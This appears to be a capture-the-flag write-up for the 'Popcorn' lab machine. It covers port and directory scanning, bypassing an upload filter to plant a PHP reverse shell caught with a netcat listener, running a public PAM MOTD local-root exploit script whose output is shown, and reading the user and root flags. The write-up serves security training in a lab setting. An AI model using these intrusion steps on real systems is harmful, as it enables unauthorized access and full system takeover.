NMAP:
root@37f72653a832:/# nmap -sC -sV -T4 -p- 10.10.10.6
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-14 23:52 UTC
Nmap scan report for 10.10.10.6
Host is up (0.019s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.63 seconds
GOBUSTER:
/index (Status: 200)
/index.html (Status: 200)
/test (Status: 200)
/test.php (Status: 200)
/torrent (Status: 301)
/rename (Status: 301)
Navigating to /torrent
reveals a torrent hoster. Here I can create an account. Once logged in I can upload a torrent file.
Now once the torrent file is uploaded I can click on Edit this torrent
to upload a screenshot. This is where I will upload a reverse php shell and will intercept the request using Burpsuite to bypass the upload filter.
I change the Content type of the request from application/octet-stream
to image/jpeg
and then forward the request. I get a success message that file was uploaded

Now going back to the torrent uploader the screenshot section now displays a messsage like Image File Not Found!
. Clicking on the message triggers the shell and opens up the reverse connection. I get a shell as www-data
root@37f72653a832:/# nc -lvnp 9999
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 10.10.10.6.
Ncat: Connection from 10.10.10.6:53362.
whoami
www-data
From here I can read the user.txt
flag
www-data@popcorn:/home/george$ cat user.txt
5e36a929398ecc5d5c110f2d865cf136
After doing some enumeration around the box I find that it is running an outdated version of PAM. I confirm this using the command below
www-data@popcorn:/home/george/.cache$ dpkg -l | grep pam
dpkg -l | grep pam
ii libpam-modules 1.1.0-2ubuntu1 Pluggable Authentication Modules for PAM
ii libpam-runtime 1.1.0-2ubuntu1 Runtime support for the PAM library
ii libpam0g 1.1.0-2ubuntu1 Pluggable Authentication Modules library
ii python-pam 0.4.2-12ubuntu3 A Python interface to the PAM library
Checking Exploit Database there is this exploit that can be used to escalate privileges.
www-data@popcorn:/dev/shm$ bash 14339.sh
bash 14339.sh
[*] Ubuntu PAM MOTD local root
[*] SSH key set up
[*] spawn ssh
[+] owned: /etc/passwd
[*] spawn ssh
[+] owned: /etc/shadow
[*] SSH key removed
[+] Success! Use password toor to get root
Password: toor
root@popcorn:/dev/shm#
From here I can read the root.txt
file
root@popcorn:~# cat root.txt
cat root.txt
f122331023a9393319a0370129fd9b14